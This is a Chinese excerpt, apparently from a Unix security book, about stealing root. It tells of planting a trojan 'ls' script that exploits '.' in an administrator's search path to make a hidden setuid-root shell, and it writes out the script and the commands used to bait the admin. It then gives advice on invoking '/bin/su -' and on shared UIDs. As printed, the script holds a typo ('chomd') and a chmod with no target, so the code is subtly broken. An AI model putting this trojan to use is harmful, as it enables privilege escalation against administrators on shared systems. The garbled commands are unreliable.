书摘:
1. 盗窃超级用户
许多年前,我们中的一个人想要访问一台学术计算机上的root账号.虽然该系统的管理员允许我们访问root账号,但是本地的系统管理员却不想告诉我们root密码.他宣称,访问root账号是很危险的(这是正确的),而他对Unix要比我们懂得多(这可不一定),因此我们不需要这种访问(这是不正确的).在尝试了几次"外交"以及"官僚"谈判以后,管理员勉强同意我们采用另一种稍有不同的方法.
我们注意到该用户的shell搜索路径起始处包含了".".这就是说,每次他键入一个命令名,shell首先在当前路径下查找这一名字.当他执行su切换到root用户时,新shell继承了这一搜索路径.这就是我们想要的.
首先,我们在当前目录下创建了一个可执行的shell文件,名为ls:
#!/bin/sh
cp /bin/sh ./stuff/junk/.superdude
chomd 4555 ./stuff/junk/.superdude
rm -f $0
exec /bin/ls ${1+"$@"}
然后,执行了以下命令:
% cd
% chmod 700
% touch ./-f
现在陷阱已经做好了.我们就开始向那个顽固的管理员报怨说:"在我的目录中,有一个奇怪的文件,我无法删除该文件."因为该目录的状态为700,因此他无法列出目录内容.于是,他使用su切换为root用户.然后,他转到我们的主目录下,使用命令ls来查看问题文件.而实际上他运行的是我们编写的ls程序,而不是系统命令.这一程序创建了一个隐藏的setuid root的shell拷贝,然后删除了伪造的ls命令,送运行了真实的ls命令.而该系统管理员对些一无所知.
当他傲慢地向我们解释说,以破折号(-)开始的文件名,必须带上相对路径名才能删除时(在这个例子中,应该使用rm ./-f),我们很有礼貌地听着;当然,他所讲的内容我们一清二楚.
几分钟之后,他就无法得到root 的新密码了.
2.% /bin/su -
password:123456
#whoami
root
#
当使用su命令切换到超级用户时,你应该习惯键入命令的全路径名/bin/su.这样就可以确保所运行的确实是/bin/su命令,而不是其他路径里的su程序.
当使用su命令切换到超级用户时,使用破折号(-)是很重要的:这一选项保证用户能够使用超级用户的路径,而不是原来账号的路径设置.
3.如果两个用户的UID相同,即使用户名与密码都不相同,Unix也会认为这是同一个用户.两个UID相同的用户能够自由地阅读和删除对方的文件,并且能够互相删除程序.